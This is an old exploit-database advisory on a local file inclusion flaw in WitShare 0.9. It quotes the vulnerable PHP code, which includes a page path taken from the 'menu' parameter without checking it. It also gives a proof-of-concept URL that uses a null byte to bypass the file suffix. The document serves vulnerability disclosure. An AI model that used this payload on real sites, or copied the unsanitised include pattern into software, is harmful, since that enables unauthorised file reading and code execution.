WitShare 0.9 - 'index.php?menu' Local File Inclusion

EDB-ID:

3686




Platform:

PHP

Date:

2007-04-08


"""""""""""""""""""""""""""""""""""""""""""""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
"""""""""""""""""""""""""""""""""""""""""""""""
   Xmor$ Security Vulnerability Research TM

# Tilte:  witshare 0.9 Local File Include Vulnerabilitiy

# Author..................: [the_Edit0r]
# HomePage ...............: [Www.XmorS-sEcurity.coM]
# Location ...............: [Iran]
# Software ...............: [witshare]
# Site Script ............: [http://sourceforge.net/projects/witshare/]
# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T ,DarkAngel ]
 

------------------------------------- Codes --------------------------------

<?php
  if (isset($_GET['menu'])) {
    include('pagelets/'.$_GET['menu'].'.inc');}
  else {
    include('pagelets/about.inc');}
 ?>
------------------------------- proof Of Concept ---------------------------
 
 www.example.com/[path]/index.php?menu=[Local Script]%00
 

----------------------------------------------------------------------------
 
 
# Contact me : the_3dit0r[at]Yahoo[dot]coM
# [XmorS-SEcurity.coM]

# milw0rm.com [2007-04-08]